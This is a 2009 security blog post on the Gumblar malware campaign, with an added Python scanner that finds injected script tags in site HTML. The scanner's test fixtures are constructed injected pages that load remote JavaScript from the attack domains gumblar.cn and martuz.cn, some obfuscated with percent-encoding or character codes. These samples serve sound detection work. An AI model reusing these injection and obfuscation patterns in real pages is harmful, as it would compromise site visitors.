“Gumblar” web attack spreading fast

A dangerous attack compromising websites is on the prowl. It’s known as “Gumblar”.

A complex new malware attack is setting infection records and raising alarms from security experts.
Known unofficially as ‘Gumblar’ for one of the attack domains, the malware is raising eyebrows and alert levels both for its prolific attack methods and for the danger of its payload.

So how does it work in general terms?

According to researchers, the attack is spreading through site compromises which inject malicious JavaScript code into components of the site. Upon visiting the infected pages, a visitor is exposed to the JavaScript attack.

Once a site is compromised, the malware alters access credentials and folder permissions to give the attacker a ‘back door’ into the site even after the owner has changed passwords. The malicious JavaScript is also varied slightly from copy to copy, preventing administrators from automatically searching out and deleting the malicious scripts.

What’s the cause for concern?

First detected in late March, researchers thought that the attacks had been halted by mid-April when Google delisted the offending sites.

However, a new variant on the attack arose early this month and has since enjoyed nearly unprecedented success. Security firm ScanSafe estimates that Gumblar attacks have jumped some 188 per cent over the last week alone, and Sophos credits Gumblar with up to 42 per cent of all malware infections in the last seven days.

“The gross infection rate is exceptional, especially this late in the game,” said Mary Landesman, senior security researcher at ScanSafe.

“Basically, it has been enjoying free rein.”

Why the concern regarding the malware payload?

The malware intercepts web traffic such as Google search requests and redirects it to present fraudulent results, allowing the attackers to collect referral fees and placing the user at risk for further infection.

The malware contains botnet controllers and is programmed to collect all FTP permissions on the infected systems, allowing Gumblar to infect any sites which the user administrates, further fostering the spread to new domains.

To make matters worse for security administrators, the creators have altered the script and are launching it from a new domain.

Over the weekend, the Chinese web domain used to deliver the malicious code — gumblar.cn — stopped responding, according to Unmask Parasites, a service used to detect malicious code embedded in web pages. The attacks’ malicious payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said in an advisory published on Monday.

“They have slightly modified the script and now inject a new version that loads malicious content from a new domain,” Unmask Parasites said in the advisory.

Changes to the script make it harder to identify and help it evade detection by the Google Chrome browser, Unmask Parasites said.

In early May, as website operators began to clean up their sites, the attackers replaced the original malicious code with dynamically generated and heavily obfuscated JavaScript, meaning that the scripts change from page to page and are difficult for security tools to spot.
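Because the injected script is varied slightly from page to page (and, in the later variant, encoded at run time), a fixed-string search is not enough for a site owner trying to find it. The following is an added, defender-side example written for this post; it is not code from the article, from Unmask Parasites or ScanSafe, and not the attackers' script. It scans page HTML, peels off simple string-encoding layers (`String.fromCharCode`, `\xNN`, `%XX`), and scores each `<script>` element. The domains gumblar.cn and martuz.cn come from the article; every sample page, URL path and the list of obfuscation idioms are constructed for the example and marked as such.

```python
import math
import re
from collections import Counter
from urllib.parse import unquote

# Payload domains named in the article.
KNOWN_BAD_DOMAINS = ("gumblar.cn", "martuz.cn")

# Idioms common in obfuscated script loaders (an assumption of this example,
# not a signature taken from the article).
OBFUSCATION_IDIOMS = ("unescape(", "String.fromCharCode(", "eval(", "document.write(")

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
BLOB_RE = re.compile(r"[A-Za-z0-9%\\+/=]{40,}")

# Constructed sample pages (not real Gumblar code); the paths are placeholders.
CLEAN_PAGE = """<html><head><script src="/js/jquery.min.js"></script></head>
<body><p>Welcome</p></body></html>"""

DIRECT_INJECT = """<html><body><p>Welcome</p>
<script src="http://gumblar.cn/PLACEHOLDER.js"></script></body></html>"""

# Constructed: the loader tag is hidden inside a percent-encoded string.
OBFUSCATED_INJECT = """<html><body><p>Welcome</p>
<script>var a="%3Cscript%20src%3D%22http%3A%2F%2Fmartuz.cn%2FPLACEHOLDER%22%3E%3C%2Fscript%3E";
document.write(unescape(a));</script></body></html>"""

# Constructed: the domain is assembled from character codes at run time.
CHARCODE_INJECT = """<html><body><p>Welcome</p>
<script>var d=String.fromCharCode(109,97,114,116,117,122,46,99,110);
var s=document.createElement("script");s.src="http://"+d+"/PLACEHOLDER.js";
document.body.appendChild(s);</script></body></html>"""


def extract_scripts(html):
    """Return (src, body) for every <script> element in the page."""
    scripts = []
    for attrs, body in SCRIPT_RE.findall(html):
        m = SRC_RE.search(attrs)
        scripts.append((m.group(1) if m else "", body.strip()))
    return scripts


def shannon_entropy(text):
    """Bits per character; long high-entropy runs suggest encoded payloads."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def decode_layers(body, max_rounds=5):
    """Peel off simple encoding layers so a hidden domain becomes matchable."""
    text = body
    for _ in range(max_rounds):
        new = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(x)) for x in m.group(1).split(",") if x.strip()),
            text)
        new = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), new)
        new = unquote(new)
        if new == text:
            break
        text = new
    return text


def score_script(src, body):
    """Score one script element; higher means more suspicious."""
    score, reasons = 0, []
    decoded = decode_layers(body)
    haystack = (src + " " + decoded).lower()
    for dom in KNOWN_BAD_DOMAINS:
        if dom in haystack:
            score += 3
            reasons.append("references known payload domain " + dom)
    idioms = [i for i in OBFUSCATION_IDIOMS if i in body]
    if len(idioms) >= 2:
        score += 1
        reasons.append("obfuscation idioms: " + ", ".join(idioms))
    if decoded != body:
        score += 1
        reasons.append("string-encoding layers were peeled off")
    if any(shannon_entropy(t) > 4.0 for t in BLOB_RE.findall(body)):
        score += 1
        reasons.append("long high-entropy blob")
    return score, reasons


def scan_page(html, threshold=2):
    """Return the scripts in a page whose score reaches the threshold."""
    findings = []
    for idx, (src, body) in enumerate(extract_scripts(html)):
        score, reasons = score_script(src, body)
        if score >= threshold:
            findings.append({"index": idx, "src": src, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("direct", DIRECT_INJECT),
                       ("obfuscated", OBFUSCATED_INJECT), ("charcode", CHARCODE_INJECT)]:
        print(name, scan_page(page))
```

The decoding step is what lets a known-domain match survive the per-page variation: the clean page scores 0, the plain injected tag scores on the domain alone, and both encoded variants still resolve to the named domain once their string layers are peeled off. The score threshold keeps a single `document.write(` or a lone `%20` in legitimate code from being reported on its own; a site owner running this over a whole document root would review the flagged scripts rather than delete them automatically.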

The malware spreads in typical fashion, via software vulnerabilities.

The scripts attempt to exploit vulnerabilities in Adobe’s Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer, ScanSafe said.

In other words, to avoid being infected by this malware, keep your systems updated so that these vulnerabilities cannot be exploited.


About brvanlanen

Just a thirty-something guy currently hanging it up in the greater Green Bay area. My post-high school educational background is mainly in the Information Technology field. Specifically I have an A.A.S. in Computer Network Systems and a B.S. in Information Systems Security, both from ITT Technical Institute, in addition to A and MCDST certifications. In my free time I enjoy spending time with my family, cooking and sports. My Christian faith is also important to me as a Missouri-Synod Lutheran and all my children attend a Lutheran grade school. When it comes to political leanings I am a conservative first and foremost which you will discover rather quickly. As for sports I am a huge fan of the Green Bay Packers.

Posted on May 19, 2009, in attacks, Javascript, malware, Security, Web. Bookmark the permalink. Comments Off on “Gumblar” web attack spreading fast.
